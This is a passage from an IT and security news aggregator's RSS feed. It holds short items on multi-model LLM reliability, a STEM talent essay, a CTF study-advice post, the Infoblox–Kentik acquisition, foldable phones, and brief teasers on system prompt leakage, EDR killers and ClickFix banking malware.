a mathematically guaranteed ceiling.</p><p>Applied to language models, suppose a team tests a pool of five agents on 50 sample queries and finds they all fail together on just two questions. A developer might assume their multi-agent system will achieve 96% accuracy in production. The Clopper-Pearson formula corrects this optimism. It analyzes the small sample size and provides a mathematical guarantee that the true co-failure rate could actually be as high as 12%.</p><p>To use this in practice, enterprises must build a held-out dataset. A fintech company, for example, could take 200 complex customer support tickets from the previous quarter and have human agents write perfect resolutions to serve as a benchmark. While this sounds like a heavy manual project, mature engineering teams can automate the entire ceiling calculation.</p><p>"Integration is trivial: it's a counting job over eval logs teams already produce," Chen notes, "so it runs in the same CI stage as the eval suite and re-triggers whenever the model pool or the workload changes."</p><p>The engineering team then runs its candidate models against these 200 tickets once and records the results. When they want to evaluate multi-model configurations, they can use the co-failure rate measure to predict the maximum accuracy they can get from the system without running extra queries.</p><p>One important conclusion the study draws is that on tasks where answers can be definitively checked, combining models rarely beats using the single best model on the market, unless the team possesses an exceptionally strong query-level routing signal.</p><p>In an enterprise environment, a definitively checked task has an objective, zero-tolerance answer. This includes generating a SQL query that must execute without error, extracting a specific invoice total from a 50-page PDF, or formatting a JSON payload that perfectly matches a strict schema. For these tasks, enterprises are usually better off paying a premium for the smartest frontier model rather than weaving together three cheaper models and hoping a router picks the correct output. The study didn't test subjective, ungraded tasks like drafting marketing copy — the authors note that whether these findings hold outside their verifiable benchmarks remains an open question.</p><p>Because this mathematical check is free, enterprise teams can track their own co-failure rates as new models drop.</p><p>"The measurement costs nothing, so any team can track its own co-failure rate across model generations and watch whether the tail is closing," says Chen. Ultimately, "the lever buyers hold is failure-mode heterogeneity and market churn, not model count."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[We're rolling out AlphaEvolve widely to solve Google Cloud customers' hardest problems.]]></title>
<description><![CDATA[Finding the most efficient algorithm — whether designing a microchip, routing a logistics network or accelerating medical research — can be challenging, with many possib…]]></description>
<link>https://tsecurity.de/de/3657615/it-nachrichten/were-rolling-out-alphaevolve-widely-to-solve-google-cloud-customers-hardest-problems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657615/it-nachrichten/were-rolling-out-alphaevolve-widely-to-solve-google-cloud-customers-hardest-problems/</guid>
<pubDate>Thu, 09 Jul 2026 18:02:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/1-Blog_hero_pic.max-600x600.format-webp.webp">Finding the most efficient algorithm — whether designing a microchip, routing a logistics network or accelerating medical research — can be challenging, with many possib…]]></content:encoded>
</item>
<item>
<title><![CDATA[Giant Swarm öffnet KI-Agenten-Plattform in Kubernetes-Umgebungen für Kunden]]></title>
<description><![CDATA[Giant Swarm will KI-Agenten als isolierte Workloads in eigenen Kubernetes-Clustern betreiben – On-Premises, Air-gapped oder hybrid, ohne SaaS-Abhängigkeit.]]></description>
<link>https://tsecurity.de/de/3657287/it-nachrichten/giant-swarm-oeffnet-ki-agenten-plattform-in-kubernetes-umgebungen-fuer-kunden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657287/it-nachrichten/giant-swarm-oeffnet-ki-agenten-plattform-in-kubernetes-umgebungen-fuer-kunden/</guid>
<pubDate>Thu, 09 Jul 2026 16:02:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Giant Swarm will KI-Agenten als isolierte Workloads in eigenen Kubernetes-Clustern betreiben – On-Premises, Air-gapped oder hybrid, ohne SaaS-Abhängigkeit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nandan Nilekani leaves GP role at Fundamentum as it launches $200M third fund]]></title>
<description><![CDATA[Nilekani remains Fundamentum's anchor investor as the firm expands its leadership team and targets AI and fintech startups in India.]]></description>
<link>https://tsecurity.de/de/3656938/ai-nachrichten/nandan-nilekani-leaves-gp-role-at-fundamentum-as-it-launches-200m-third-fund/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656938/ai-nachrichten/nandan-nilekani-leaves-gp-role-at-fundamentum-as-it-launches-200m-third-fund/</guid>
<pubDate>Thu, 09 Jul 2026 14:02:17 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nilekani remains Fundamentum's anchor investor as the firm expands its leadership team and targets AI and fintech startups in India.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI agents aren’t the end of SaaS – they’re driving its next phase of growth]]></title>
<description><![CDATA[AI agents won’t replace SaaS, they’ll fuel its evolution into the enterprise execution layer.]]></description>
<link>https://tsecurity.de/de/3656597/it-nachrichten/ai-agents-arent-the-end-of-saas-theyre-driving-its-next-phase-of-growth/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656597/it-nachrichten/ai-agents-arent-the-end-of-saas-theyre-driving-its-next-phase-of-growth/</guid>
<pubDate>Thu, 09 Jul 2026 12:01:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AI agents won’t replace SaaS, they’ll fuel its evolution into the enterprise execution layer.]]></content:encoded>
</item>
<item>
<title><![CDATA[Why the US is at risk of losing the AI talent and productivity war]]></title>
<description><![CDATA[The hardest thing to manage is change. I wrote that line more than a decade ago in an article about the “XPocalypse,” Microsoft’s end-of-life deadline for Windows XP. My argument then was that the real crisis was not obsolete software. It was the shortage of technically literate professionals cap...]]></description>
<link>https://tsecurity.de/de/3656445/it-security-nachrichten/why-the-us-is-at-risk-of-losing-the-ai-talent-and-productivity-war/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656445/it-security-nachrichten/why-the-us-is-at-risk-of-losing-the-ai-talent-and-productivity-war/</guid>
<pubDate>Thu, 09 Jul 2026 11:08:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The hardest thing to manage is change. <a href="https://www.forbes.com/sites/ciocentral/2014/05/06/the-role-of-stem-education-in-shaping-the-future-of-information-security/" rel="nofollow">I wrote that line more than a decade ago in an article about the “XPocalypse,”</a> Microsoft’s end-of-life deadline for Windows XP. My argument then was that the real crisis was not obsolete software. It was the shortage of technically literate professionals capable of guiding organizations through inevitable transitions.</p>



<p>More than a decade later, the names have changed. The lesson has not.</p>



<p>Y2K defined the pattern. The risk was real, but disaster was avoided because skilled people did the work. When nothing happened at midnight (1999-2000), many assumed the threat had been exaggerated instead of recognizing that it had been managed. Windows XP became the next version of the same problem. The operating system stayed embedded in retail, banking, healthcare, energy, law enforcement and defense systems long after it should have been retired. The vulnerability was real, but the larger lesson was mostly missed: organizations let technical debt pile up until a deadline turns it into a crisis.</p>



<h2 class="wp-block-heading">Is agentic AI actually breaking the enterprise SaaS business model?</h2>



<p>Now we have the “<a href="https://www.cio.com/article/4166654/why-the-saaspocalypse-story-youre-hearing-is-missing-the-most-dangerous-part.html">SaaSpocalypse</a>.” Headlines warn that agentic AI is breaking the SaaS business model, lowering software valuations and making entire categories of enterprise tools obsolete. Investors are reacting; analysts are talking about “FOBO,” Fear of Becoming Obsolete, and organizations are again asking whether they are ready for what comes next.</p>



<p>The disruption is real. AI agents can now automate workflows that once required dedicated software tools and teams of human operators. The per-seat pricing model that powered two decades of SaaS economics is under pressure. But the apocalyptic framing misdiagnoses the problem. SaaS is not dying. It is bifurcating.</p>



<p>Platforms requiring precision, auditability, complex state management and regulatory accountability, such as financial systems, healthcare records and compliance infrastructure, will remain essential. What is collapsing is the undifferentiated middle: horizontal tools that AI agents can replicate cheaply and at scale.</p>



<p>The organizations most exposed are not simply those using the wrong software. They are those who outsourced technical judgment along with technical execution. They bought SaaS as a substitute for internal capability, accumulated organizational debt and now lack the human capital to navigate a transition that is fundamentally about people and process.</p>



<p>The old taxonomy still applies: people, process and technology. Technology serves business functions. Processes create efficiency. Qualified people sustain both. But the <a href="https://www.harveynash.co.uk/latest-news/digital-leadership-report-2025" rel="nofollow">pace of technological change</a> continues to outrun the education system’s ability to produce experienced professionals with current skills.</p>



<p><a href="https://www.cio.com/video/4033057/is-the-ai-skills-shortage-a-threat-to-it-leaders-what-it-leaders-want-ep-10.html">AI has widened that gap</a>. Data engineers now design orchestration infrastructure that determines whether AI produces value or liability. Security practitioners must govern autonomous agents acting on behalf of enterprises. Business leaders need enough technical fluency to make build-versus-buy decisions in a market changing in real time.</p>



<p>These are not narrow technical tasks. They are the applied outputs of serious STEM education grounded in a business context, professional standards and sustained practice. We are still not producing enough people who have those skills.</p>



<h2 class="wp-block-heading">How is the growing STEM education gap threatening AI leadership?</h2>



<p>The numbers are sobering. The United States now produces fewer than 820,000 STEM graduates annually, representing about 20% of all degrees awarded. China produces approximately 3.57 million STEM graduates each year, about 40% of its university degrees. At the doctoral level, the gap is sharper. In 2000, the United States awarded 17,830 STEM PhDs, compared with China’s 7,520. By 2022, China awarded more than 50,970 STEM doctorates, over 50% more than the 33,820 awarded in the United States.</p>



<p>This matters directly to AI leadership. Countries building the strongest STEM pipelines today are positioning themselves to define the architecture, governance and standards of AI systems tomorrow.</p>



<h2 class="wp-block-heading">How can we solve the AI talent shortage and rebuild the IT profession?</h2>



<p>More than a decade ago, I argued that IT must be treated as a profession, not merely a resource. Finance, medicine, law, engineering and accounting all have formal professional pathways, standards and institutional support. Information technology underpins nearly every critical function of modern society, yet still lacks equivalent professional frameworks.</p>



<p>The AI transition makes this more urgent. As AI absorbs routine execution, the humans left in the loop must be more capable, not fewer. Their role is shifting from implementation to governance, from configuration to architecture, from maintenance to judgment. That requires better preparation, stronger incentives and professional recognition.</p>



<p>The United States still leads in private AI investment, but it has not matched that commitment with investment in the human capital needed to sustain it. China has embedded AI degree programs across more than 500 universities and integrated corporations directly into research and workforce pipelines. India’s AI upskilling surge is driven heavily by corporate sponsorship, with employers treating workforce education as strategic investment. The European Union has committed significant public funding to AI talent development and cross-border STEM mobility.</p>



<p>The United States has examples worth scaling. North Carolina’s AI Academy at NC State, built with more than 100 corporate partners, combines university credentialing with applied workplace training. North Carolina A&amp;T, the nation’s leading producer of Black engineers, is partnering with NVIDIA and the Office of Naval Research to expand AI and cybersecurity talent. Texas has committed heavily to doctoral research infrastructure through the Texas Institute for Electronics, linking universities, government and industry around semiconductor and defense technology priorities.</p>



<p>These models show what a national strategy should look like: public investment, corporate sponsorship, university research capacity and continuous pathways from undergraduate study through doctoral work. But they remain exceptions. Corporate PhD fellowships from leading technology companies are valuable, but they are filters, not pipelines.</p>



<p>The technology sector has long harvested talent from a pipeline it does not adequately fund, then wondered <a href="https://www.manpowergroup.com/en/insights/2026-global-talent-shortage" rel="nofollow">why the pipeline runs short.</a> That model is no longer sustainable. Federal and state governments must create the policy environment, including tax incentives, credentialing reform, research funding and visa frameworks, that makes corporate STEM investment structurally attractive rather than reputationally optional.</p>



<p>The SaaSpocalypse will pass, as Y2K and the XPocalypse passed, because capable people will do the work. The headlines will move on. The underlying shortage will remain.</p>



<p>What I called for in 2014 still stands: STEM education, paired with business, information management and finance, must become a sustained national infrastructure. Not as a reaction to this disruption, but as preparation for the next one.</p>



<p>The hardest thing to manage is change. The next is learning from it.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Need help get out tutorial hell. Develop pwn CTF skills, build a foundation in Vuln Exploit, RE, etc]]></title>
<description><![CDATA[Hi guys, recently Im in a loop, hop on and off different site different courses in and out, back and forth while feeling making ZERO progress.  Here, I want to share a bit about my goal, my background, my problem. And I hope I could have some advices to get out of this feeling MY GOAL: - Long ter...]]></description>
<link>https://tsecurity.de/de/3655757/malware-trojaner-viren/need-help-get-out-tutorial-hell-develop-pwn-ctf-skills-build-a-foundation-in-vuln-exploit-re-etc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655757/malware-trojaner-viren/need-help-get-out-tutorial-hell-develop-pwn-ctf-skills-build-a-foundation-in-vuln-exploit-re-etc/</guid>
<pubDate>Thu, 09 Jul 2026 04:03:07 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi guys, recently Im in a loop, hop on and off different site different courses in and out, back and forth while feeling making ZERO progress. </p> <p>Here, I want to share a bit about my goal, my background, my problem. And I hope I could have some advices to get out of this feeling</p> <p><strong>M</strong><strong>Y GOAL:</strong><br> - Long term: Get into cybersecurity field, especially roles that involve “low level” stuffs as I really interested in them. Thats it! For now, as Im pretty new to this + Im hyper focus on short term goal which I will talk right after<br> - Short term goal: Build foundation, knowledge, skills in Reverse Engineering (RE) and more excitingly Binary Exploitation, Pwn<br> - Shorter term goal: To prepare for upcoming CTF contests with my new team. More on this later </p> <p><strong>MY BACKGROUND:</strong><br> - I already familiar with Linux, CLI, some popular commands<br> - I know x86 assembly<br> - know C, C++<br> - know on surface level some basic vulnerabilities and have done very simple CTF challenges (ret2win, shellcode easy, …)<br> - do know how to use basic gdb, pwntools, ida/ghidra</p> <p>all of that is a result of following pwn.college + using Linux as daily basis + my college’s teaching on c, c++, etc</p> <p>by all means, I do not master any of these above skills I told. </p> <p><strong>MY PROBLEMS:</strong><br> So ofc Im very worrying the most about the upcoming CTF because Im new and feel like know nothing yet.<br> I also stucking into tutorial hell as I have too many resources of documentation/courses that I do not know which one is suit for my current situation </p> <p>Im aware of the pinning post in this sub, that is actually where I get these resources from</p> <p>But with 2 months left until the contest, I really want to make the most out of my time. So I need help with designing a road map so to speak.</p> <p>Currently, Im looking into ironstone’s pwn notes + Nightmare CTF collection. Whatd you recommend? </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/minhincs"> /u/minhincs </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqpb3o/need_help_get_out_tutorial_hell_develop_pwn_ctf/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqpb3o/need_help_get_out_tutorial_hell_develop_pwn_ctf/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Designing for the inevitable: System prompt leakage and mitigations in generative AI applications]]></title>
<description><![CDATA[System prompts form the foundation of generative AI applications. A system prompt is a collection of instructions and operational context provided to a large language model (LLM) that shapes how the model behaves and interacts with users and tools. System…
Read more →
The post Designing for the i...]]></description>
<link>https://tsecurity.de/de/3655283/it-security-nachrichten/designing-for-the-inevitable-system-prompt-leakage-and-mitigations-in-generative-ai-applications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655283/it-security-nachrichten/designing-for-the-inevitable-system-prompt-leakage-and-mitigations-in-generative-ai-applications/</guid>
<pubDate>Wed, 08 Jul 2026 21:23:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>System prompts form the foundation of generative AI applications. A system prompt is a collection of instructions and operational context provided to a large language model (LLM) that shapes how the model behaves and interacts with users and tools. System…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/designing-for-the-inevitable-system-prompt-leakage-and-mitigations-in-generative-ai-applications/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/designing-for-the-inevitable-system-prompt-leakage-and-mitigations-in-generative-ai-applications/">Designing for the inevitable: System prompt leakage and mitigations in generative AI applications</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Infoblox acquires Kentik, adding network observability to its DNS and DDI platform]]></title>
<description><![CDATA[Infoblox announced today that it has entered into a definitive agreement to acquire Kentik, combining Infoblox’s authoritative DNS, DHCP, and IP address management (IPAM) data with Kentik’s network observability platform. Financial terms were not disclosed.



Kentik was founded in 2014, original...]]></description>
<link>https://tsecurity.de/de/3654977/it-security-nachrichten/infoblox-acquires-kentik-adding-network-observability-to-its-dns-and-ddi-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654977/it-security-nachrichten/infoblox-acquires-kentik-adding-network-observability-to-its-dns-and-ddi-platform/</guid>
<pubDate>Wed, 08 Jul 2026 19:23:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.infoblox.com/" target="_blank" rel="noreferrer noopener">Info</a><a href="https://www.infoblox.com/">blox</a> announced today that it has entered into a definitive agreement to acquire <a href="https://www.kentik.com/" target="_blank" rel="noreferrer noopener">Kentik</a>, combining Infoblox’s authoritative DNS, DHCP, and IP address management (IPAM) data with <a href="https://www.networkworld.com/article/1302440/kentik-boosts-observability-platform-with-genai.html" target="_blank">Kentik’s network observability platform</a>. Financial terms were not disclosed.</p>



<p>Kentik was founded in 2014, originally as CloudHelix before rebranding the following year, and has raised more than $100 million in venture funding to date. The platform provides real-time visibility into network traffic and ingests flow data, routing intelligence, and device telemetry across data centers, cloud environments, WANs, and the public internet. In recent years, the company has enhanced its platform with an<a href="https://www.networkworld.com/article/4092276/kentik-bolsters-network-observability-platform-with-autonomous-investigation.html" target="_blank"> AI advisor</a> that helps to accelerate investigations.</p>



<p><a href="https://www.networkworld.com/article/4083475/infoblox-bolsters-universal-ddi-platform-with-multi-cloud-integrations.html" target="_blank">Infoblox</a> has spent more than two decades managing the DNS, DHCP, and IPAM services enterprises rely on to stay connected. In 2024, it first launched its<a href="https://www.networkworld.com/article/3540282/infoblox-tackles-integrated-ddi-across-multi-cloud-environments.html" target="_blank"> Universal DDI</a> SaaS platform for managing DNS, DHCP, and IP addresses from a single place,<a href="https://www.networkworld.com/article/4083475/infoblox-bolsters-universal-ddi-platform-with-multi-cloud-integrations.html" target="_blank"> expanding in 2025</a> to more providers. DDI refers to the trio of core network services in IP networks: DNS, which turns domain names into IP addresses; DHCP, which assigns IP addresses to resources; and IPAM, which manages the network’s IP address infrastructure.</p>



<p>Infoblox and Kentik each had something the other one was missing.</p>



<p>“We know every device, every application across the hybrid multi cloud state, we know because we handed out the IPs, or we have acquired those assets,” <a href="https://www.linkedin.com/in/mukesh77/" target="_blank" rel="noreferrer noopener">Mukesh Gupta</a>, chief product officer at Infoblox, told <em>Network World</em>. “We know what is on the network. We don’t know who is talking to who.”</p>



<h2 class="wp-block-heading">The path to acquisition<strong></strong></h2>



<p>“We’ve been talking for a few years,” <a href="https://www.linkedin.com/in/avifreedman/" target="_blank" rel="noreferrer noopener">Avi Freedman</a>, co-founder and CEO of Kentik, told<em> Network World</em>.</p>



<p>Both Gupta and Freedman said the companies have discussed working together for several years, driven largely by customers who use both platforms and asked the two vendors to integrate them directly.</p>



<p>“We’ve gone from very internet-centric companies to some of the largest enterprises in the world, and guess who they use for all of their core sources of truth,” Freedman said. “So, our customers have been saying, hey, you have this great platform that can take all this enrichment, and we need you to be doing this kind of integration.”</p>



<p>For Infoblox, the situation was similar. Gupta noted that some of the problems his company was trying to solve require <a href="https://www.networkworld.com/article/972187/how-to-shop-for-network-observability-tools.html" target="_blank">network flow information</a>, which Kentik provides.</p>



<p>“We have a lot of common customers, and they were like, ‘Can you bring these platforms together?’” Gupta said.</p>



<h2 class="wp-block-heading">What the integration will enable<strong></strong></h2>



<p>The combination of the two companies’ technologies will bring more capabilities to users.</p>



<p>One specific example cited by Gupta has to do with the company’s Infoblox IQ, an agentic operations layer that was announced in June 2026, One of its existing capabilities, called IQ Actions, is designed to detect problems and begin investigating them automatically, before a customer notices an issue.</p>



<p>The system monitors DNS and DHCP metrics for anomalies, then automatically collects related data and analyzes it using large language models before an operator opens the ticket.</p>



<p>“We throw that data into LLMs and see if they can figure out what the root cause is, and come up with a recommendation, so all of that happens completely automatically,” Gupta said.</p>



<p>What Kentik would add to that workflow is flow data. Combining Infoblox’s DNS-based threat intelligence with Kentik’s flow data could extend the same kind of automatic investigation into security incidents. DNS data can identify devices communicating with a command and control server. Flow data can then show where those devices connected next inside the network.</p>



<p>“With flow data, we can draw that blast radius and tell customers proactively what the issue is and what the exposure is,” Gupta said.</p>



<p>Kentik’s own AI Advisor is moving in a similar direction, from answering direct questions to carrying out tasks on its own. The combination with DDI information will help to support that vision.</p>



<p>“What we’ve been working on is making it proactive, so basically operating Kentik for you, doing your networking tasks, all your planning, capacity optimization, troubleshooting,” Freedman said. </p>



<p>Freedman traced that same logic back to why the deal made sense in the first place.</p>



<p>“We can actually build an amazing platform together, which customers are actually asking for, which is always the best way to build a business,” he said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The $2,000 club: Apple, Samsung, Google bet on foldables]]></title>
<description><![CDATA[Apple, Samsung, and Google are all expected to introduce their takes on folding smartphones in the coming weeks. 



All three competitors work together on some things; Samsung allegedly makes displays for iPhone; Google makes an OS for Samsung; and Apple works with Google Gemini for AI. That pro...]]></description>
<link>https://tsecurity.de/de/3654849/it-nachrichten/the-2000-club-apple-samsung-google-bet-on-foldables/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654849/it-nachrichten/the-2000-club-apple-samsung-google-bet-on-foldables/</guid>
<pubDate>Wed, 08 Jul 2026 18:19:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Apple, Samsung, and Google are all expected to introduce their takes on folding smartphones in the coming weeks. </p>



<p>All three competitors work together on some things; Samsung allegedly makes displays for iPhone; Google makes an OS for Samsung; and Apple works with Google Gemini for AI. That proximity suggests that we might experience some synchronicity between these devices when they finally arrive.</p>



<h2 class="wp-block-heading"><strong>Samsung and Google move first — but September belongs to Apple</strong></h2>



<p><em><a href="https://www.bloomberg.com/news/articles/2026-07-07/samsung-to-get-jump-on-apple-s-first-foldable-launch-with-galaxy-fold-8-july-22" target="_blank" rel="noreferrer noopener">Bloomberg</a></em> agrees: the publication claims Samsung’s forthcoming Galaxy Unpacked event in London on July 22 will feature the Galaxy Z Fold 8, which will have a short, wide design “that resembles Apple Inc.’s planned folding iPhone.”</p>



<p>It is <a href="https://tech.sportskeeda.com/mobiles/galaxy-z-fold-8-series-prices-leaked-here-s-much-cost" target="_blank" rel="noreferrer noopener">expected to cost around $1,999</a> for the 256GB model. The late July introduction is widely seen as an attempt to steal a little thunder from the upcoming launch of the iPhone Fold/Ultra, Apple’s first foldable device.</p>



<p>Google is also chasing the looming Apple thundercloud with its own “<a href="https://arstechnica.com/gadgets/2026/07/googles-pixel-11-launch-event-is-set-for-august-12-with-possible-price-increases/" target="_blank" rel="noreferrer noopener">Made by Google</a>” event in New York on Aug. 12. This is expected to be a Pixel family update, likely including a successor to the Pixel 11 Pro Fold. Leaks suggest these devices will have more RAM (for AI), more storage — with a 256GB minimum — and be priced at an <a href="https://www.androidauthority.com/google-pixel-11-storage-colors-price-leak-3684868/" target="_blank" rel="noreferrer noopener">estimated $1,999</a> – or <a href="https://9to5google.com/2026/07/07/pixel-11-price-128gb-release-date-leak/" target="_blank" rel="noreferrer noopener">maybe even more</a>.</p>



<p>Both of these devices will be great. Both will likely be compelling; but what we don’t know yet is how the decade or so Apple has spent designing and developing its own folding smartphones will crystallize into the final result. </p>



<h2 class="wp-block-heading"><strong>A decade in development, but will it blend?</strong></h2>



<p>Apple has its reputation on the line – will its phone stand out for its combination of high-tech and high design, or will the company fail in its bid to stand apart? We’ll find out in September when Apple’s folding smartphone finally appears, and the oxygen once again starts circulating around this part of the room.</p>



<p>We do know that the iPhone Ultra has entered mass production, with <em><a href="https://www.macrumors.com/2026/07/08/foldable-iphone-ultra-mass-production-no-delay/" target="_blank" rel="noreferrer noopener">MacRumors</a></em> seemingly rebutting <a href="https://www.computerworld.com/article/4193280/forget-the-hype-iphone-ultra-scarcity-will-tell-the-story.html">recent claims by Ming-Chi Kuo</a> that the device might ship later than expected and be in <a href="https://www.computerworld.com/article/4193280/forget-the-hype-iphone-ultra-scarcity-will-tell-the-story.html">short supply once it appears</a>. Citing Chinese supply chain sources, the report says manufacturing has begun. Other reports indicate Apple has <a href="https://www.applemust.com/apple-to-sell-10m-iphone-ultra-grab-29-share/" target="_blank" rel="noreferrer noopener">increased initial manufacturing orders</a> to 10 million units. Somewhere in between the truth lies.</p>



<p>The iPhone Ultra is <a href="https://www.applemust.com/what-we-think-we-know-about-iphone-ultra/" target="_blank" rel="noreferrer noopener">expected to be a book-style foldable</a> with a 7.8-in. inner display and a 5.5-in. cover display, Touch ID, an Apple C2 modem and an A20 processor. It will run iOS 27, which has already been found to be capable of changing display layout and resolution to seamlessly switch between different views; moving from the outer to the inner display should seem almost instantaneous, with smooth transitions between both states. </p>



<h2 class="wp-block-heading"><strong>The hinges need to do the talking</strong></h2>



<p>Apple has paid particular attention to the hinge design, which is thought to be near invisible to the eye and extremely robust. (It needs to be robust; the hinge will inevitably be put to some very tough tests by hungry vlogging tech influencers everywhere.)</p>



<p>Those same influencers will also be putting Siri AI to the test, with most potential customers very curious about the extent to which Apple Intelligence can turn the folding iPhone into a viable replacement for Macs or iPads. What happens when you use an iPhone Ultra with an external mouse and keyboard, for example? Will competing devices match the user experience for productive tasks?</p>



<p>At $2,000 a pop, a lot of potential customers for any of these foldable devices will be looking for a solution that ticks more boxes than simply being a giant smartphone. They will certainly want the luxury finish we can expect in all three devices, but they will also be hoping for a tool fit for a range of use cases smartphones don’t generally meet. </p>



<p>Samsung’s existing Fold range, for example, is celebrated for its advanced multitasking features and media content and consumption features, even as its ability to connect to a monitor, keyboard, and mouse (<a href="https://www.samsung.com/us/support/owners/app/samsung-dex" target="_blank" rel="noreferrer noopener">Samsung DeX</a>) makes it a convenient PC replacement.</p>



<h2 class="wp-block-heading"><strong>Resetting the high-end smartphone price point</strong></h2>



<p>You can expect much the same from all three devices: a focus on display resolution, color gamut, brightness and screen refresh rates. But for all three, the really critical point will be the resilience of the hinge. Because once the novelty of the fold fades, the winner will be the one that succeeds in becoming something more useful than the smartphone we already know. </p>



<p>In the end, these things must deliver more, not less, if they are to persuade consumers to reset their price-driven comfort zones. All of the manufacturers have a <a href="https://www.applemust.com/ram-ageddon-continues-samsung-eyes-another-20-dram-hike/" target="_blank" rel="noreferrer noopener">vested interest</a> in driving shoppers to spend even more money on their devices. </p>



<p><em>Join me on social media at </em><a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener"><em>BlueSky</em></a><em>,  </em><a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener"><em>LinkedIn</em></a><em>, or </em><a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener"><em>Mastodon</em></a><em>,and do please subscribe to </em><a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener"><em>The Core</em></a><em> for your daily collection of human-curated Apple News lovingly assembled by yours truly.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How EDR Killers Work: BYOVD, Kernel Access, And The Pre-Encryption Window]]></title>
<description><![CDATA[EDR killers now sell as SaaS-style products with dashboards and credit balances. Here's how the market works and what to harden first.]]></description>
<link>https://tsecurity.de/de/3654761/it-security-nachrichten/how-edr-killers-work-byovd-kernel-access-and-the-pre-encryption-window/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654761/it-security-nachrichten/how-edr-killers-work-byovd-kernel-access-and-the-pre-encryption-window/</guid>
<pubDate>Wed, 08 Jul 2026 17:23:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[EDR killers now sell as SaaS-style products with dashboards and credit balances. Here's how the market works and what to harden first.]]></content:encoded>
</item>
<item>
<title><![CDATA[SCMBANKER Malware Uses ClickFix Lures to Target Mexican Banking Users]]></title>
<description><![CDATA[A new banking fraudulent operation is targeting customers of Mexican banks, fintech, payment processors, and cryptocurrency exchanges using ClickFix lures.

The activity cluster, tracked by Elastic Security Labs under the moniker REF6045, involves infecting victims through fake CAPTCHA verificati...]]></description>
<link>https://tsecurity.de/de/3654588/it-security-nachrichten/scmbanker-malware-uses-clickfix-lures-to-target-mexican-banking-users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654588/it-security-nachrichten/scmbanker-malware-uses-clickfix-lures-to-target-mexican-banking-users/</guid>
<pubDate>Wed, 08 Jul 2026 16:23:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new banking fraudulent operation is targeting customers of Mexican banks, fintech, payment processors, and cryptocurrency exchanges using ClickFix lures.

The activity cluster, tracked by Elastic Security Labs under the moniker REF6045, involves infecting victims through fake CAPTCHA verification pages that deceive them into running a malicious command that installs a PowerShell toolkit dubbed]]></content:encoded>
</item>
<item>
<title><![CDATA[AI changed our cloud strategy. Quantum changes the questions behind it]]></title>
